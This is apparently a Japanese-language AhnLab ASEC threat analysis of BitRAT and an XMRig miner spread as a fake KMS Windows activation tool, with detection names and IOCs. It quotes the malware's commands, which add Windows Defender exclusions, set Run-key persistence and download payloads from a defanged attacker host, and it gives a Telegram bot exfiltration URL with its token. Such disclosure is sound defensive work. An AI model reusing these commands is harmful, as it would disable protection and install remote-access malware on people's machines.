Windows ライセンス認証ツールを利用して拡散している BitRAT、XMRig コインマイナー

ASEC 分析チームでは最近、Windows ライセンス認証ツールを装って BitRAT や XMRig コインマイナーが配布されていることを確認した。BitRAT は以下のブログでも取り上げたとおり、以前もウェブハードを通じて MS Windows ライセンス認証ツールや MS Office インストーラーに偽装して配布された履歴があり、今回ブログで取り上げる事例も同じ攻撃者によるものと推定される。特異な点としては、V3 がインストールされていない環境では BitRAT 遠隔操作ツールがインストールされ、V3 がインストールされている環境では(BitRAT ではなく)コインマイナーをインストールする機能が存在することが挙げられる。

最初の拡散事例は確認されていないが、現在の基準でマルウェアは MediaFire と呼ばれるファイルホスティングサイトに KMS Windows ライセンス認証ツールに偽装した圧縮ファイル形式でアップロードされている。

[図1] MediaFire にアップロードされたマルウェア

このようにしてアップロードされたダウンロード用アドレスは、以下のように複数の韓国国内コミュニティサイトを通じて共有された。

[図2] 韓国国内のコミュニティアーカイブスのスレッド – 1
[図3] 韓国国内のコミュニティアーカイブスのスレッド – 2

ダウンロードした圧縮ファイルを解凍すると以下のようなファイルを確認できるが、これが「KMS Tools Unpack.exe」ファイルが偽装した実際のマルウェアである。「KMS Tools Unpack.exe」は具体的には 7z SFX、すなわち自己解凍形式の圧縮ファイルである。

[図4] 圧縮ファイル内部に存在するマルウェア

一般的な圧縮プログラムのように 7z も SFX フォーマットをサポートしているが、これを使用して圧縮すると .zip や .z のような圧縮ファイルの代わりに .exe という実行ファイルが生成される。実行するだけでも製作者が希望するパスにプログラムをインストールできる等、便利に使用できるため、主にインストーラーで使用されている。参考に、7z SFX は単に内部に含まれているファイルをインストールする機能だけでなく、さらなる機能を提供する。これを利用するとインストールのプロセスで特定のコマンドを実行できる。

このマルウェアは一般的なインストーラーの形式のマルウェアとは異なり、内部にオリジナルのマルウェアが存在する形式でない限りは、内部には実際の KMS ツールのみが存在する。代わりに以下のような悪意のあるコマンドをインストールプロセスで実行することにより、さらなるマルウェアをインストールする。以下のコマンドは、マルウェアのインストール先と推定される特定のパスに対して Windows Defender がマルウェアのチェックを行わないように例外パスとして追加するコマンドとともに、外部からさらなるマルウェアをダウンロードして実行するコマンドに分けられる。

[図5] 7z SFX を開くと実行される悪意のあるコマンド

Powershell コマンドを確認すると「KMS.msi」すなわち msi フォーマットのマルウェアをダウンロードして実行するものと推定されるが、実際にダウンロードされるマルウェアは実行ファイル形式のフォーマットである。「KMS.msi」もダウンローダーとして実行すると「vmtoolsd」、「asdmon」プロセスが現在実行中かどうかをチェックして、存在する場合はさらなるマルウェアをインストールしない Anti VM および Anti Sandbox 機能が存在する。

その後、以下のコマンドを利用してダウンロードするマルウェアのパス、およびマルウェアが実行されるプロセスを例外パス、例外プロセスとして登録する。

> powershell.exe “-Command
Add-MpPreference -ExclusionPath ‘C:\Users\[ユーザー名]\AppData\Local\Temp’;
Add-MpPreference -ExclusionPath ‘C:\Users\[ユーザー名]\AppData\Local\Google\software_reporter_tool.exe’;
Add-MpPreference -ExclusionProcess ‘InstallUtil.exe’;
Add-MpPreference -ExclusionProcess ‘software_reporter_tool.exe’;
Add-MpPreference -ExclusionProcess ‘svchost.exe’;
Add-MpPreference -ExclusionPath ‘C:\Users\[ユーザー名]\AppData\Local\Microsoft\Windows\INetCache\IE'”

ダウンロードされるマルウェアは「%LOCALAPPDATA%\Google\software_reporter_tool.exe」に保存されるが、このパスを Run キーに登録して再起動以降も実行されるようにする。

> cmd.exe “/c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d C:\Users\[ユーザー名]\AppData\Local\Google\software_reporter_tool.exe /f”

「KMS.msi」には別の特徴もある。ユーザーの PC 環境に V3 がインストールされている場合とそうでない場合に応じて、インストールするマルウェアが異なるという点である。V3 がインストールされているかどうかは「ASDSvc」プロセスが現在実行中かどうかによって決定される。

[図6] V3 アンチウイルス製品の有無による条件分岐

V3 がインストールされている場合は「obieznne.msi」を、そうでない場合は「wniavctm.msi」を「%LOCALAPPDATA%\Google\software_reporter_tool.exe」にインストールする。すなわち、実行されたマルウェアは Google Chrome ブラウザのアップデートプログラムに偽装して実行されるため、一般的なユーザーでは疑わしいプロセスとして認識するのが困難である可能性がある。

> powershell.exe “Invoke-WebRequest hxxp://purposedesigns[.]net:443/obieznne.msi -OutFile C:\Users\[ユーザー名]\AppData\Local\Google\software_reporter_tool.exe” > powershell.exe “Invoke-WebRequest hxxp://purposedesigns[.]net:443/wniavctm.msi -OutFile C:\Users\[ユーザー名]\AppData\Local\Google\software_reporter_tool.exe”

ここまでのプロセスが完了すると「KMS_Tool.msi」ファイルをインストールする。現在はダウンロードができないため確認は不可能だが、実際の KMS ツールと推定される。

> powershell.exe “Invoke-WebRequest hxxp://purposedesigns[.]net:443/KMS_Tool.msi -OutFile C:\Users\[ユーザー名]\AppData\Local\Temp\zxoeqxat.msi; cmd /c C:\Users\[ユーザー名]\AppData\Local\Temp\zxoeqxat.msi”

実際の KMS ツールがインストールされていなくとも、ユーザーが実行した「KMS Tools Unpack.exe」ファイルが削除され、同じアイコンの KMS ツールが「KMSTools.exe」という名前で生成される。これにより、ユーザーは新たに生成された KMS ツールを使用できるため、マルウェアに感染したという事実を認知するのが困難であるものと推定される。

[図7] マルウェア実行後に生成された KMS ツール

最後に Telegram API を利用して感染した PC システムの基本的な情報を転送したあと、自己削除する。

[図8] マルウェアのネットワーク通信
  • 感染した PC システムの情報伝達に使用される TelegramAPI : hxxps://api.telegram[.]org/bot5538205016:AAH7S9IGtFpb6RbC8W2TfNkjD7Cj_3qxCnI/sendMessage

上記から、V3 のインストール有無によって異なるマルウェアがインストールされることが分かった。V3 が存在しない環境においてインストールされる「obieznne.msi」はインジェクターマルウェアであり、正常なプログラムである InstallUtil.exe を実行してオリジナルの BitRAT をインジェクションする。すなわち、BitRAT は InstallUtil プロセスのメモリ上で動作することにより、正常なプロセスに偽装するのである。

BitRAT は様々な機能を提供する RAT マルウェアであり、システムにインストールされると、攻撃者にプロセスタスク/サービスタスク/ファイルタスク/リモートコマンドの実行等、感染した PC システムの基本的な制御機能以外にも、様々な情報窃取機能や HVNC、リモートデスクトップ、コインマイニング、プロキシを提供している。

[図9] BitRAT の C&C 通信

V3 がインストールされている環境では BitRAT の代わりに XMRig コインマイナーがインストールされる。XMRig も正常なプログラムである svchost.exe プロセスのメモリ上で動作するため、マイニングによってコンピュータの動作が遅くなったとしても、一般的なユーザーは認知が困難な可能性がある。

[図10] XMRig コインマイナー
  • マイニングプール URL : asia.randomx-hub.miningpoolhub[.]com:20580
  • User : “coinzz88.test”
  • Pass : “”

このように、韓国国内のデータ共有サイトを通じてマルウェアが活発に出回っているため、ユーザーの注意が必要である。データ共有サイトからダウンロードした実行ファイルは特に注意が必要であり、ユーティリティおよびゲーム等のプログラムは必ず公式ホームページからダウンロードすることを推奨する。ユーザーは OS およびインターネットブラウザ等のプログラムの最新パッチや V3 を最新バージョンにアップデートし、このようなマルウェアの感染を事前に遮断できるよう注意を払わなければならない。

[ファイル検知]
– Downloader/Win.Agent.C5222945 (2022.08.14.00)
– Downloader/Win.MSIL.R510666 (2022.08.14.03)
– Trojan/Win.Generic.C5223158 (2022.08.14.02)
– CoinMiner/Win.XMRig.C5223211 (2022.08.15.00)

[ビヘイビア検知]
– Execution/MDP.Powershell.M1185
– Malware/MDP.Download.M1197
– Malware/MDP.DriveByDownload.M1298
– Execution/MDP.Powershell.M4192

[IOC]
MD5

– 74120cfeca3b003c6dbf81707216c22c (インストーラー – KMS Tools Unpack.exe)
– ce985a31420169f002706fb46d5e8cd0 (ダウンローダー – KMS.msi)
– d6cb1c1dd51917214ff41b76e904769e (BitRAT – obieznne.msi)
– 4e5cb75c3c99f30c7a22b940fd107505 (XMRig コインマイナー – wniavctm.msi)

ダウンロード URL
– hxxp://purposedesigns[.]net:443/KMS.msi (ダウンローダー)
– hxxp://purposedesigns[.]net:443/obieznne.msi (BitRAT)
– hxxp://purposedesigns[.]net:443/wniavctm.msi (XMRig コインマイナー)

C&C
– 147.189.161[.]248:80 (BitRAT)

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 2 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments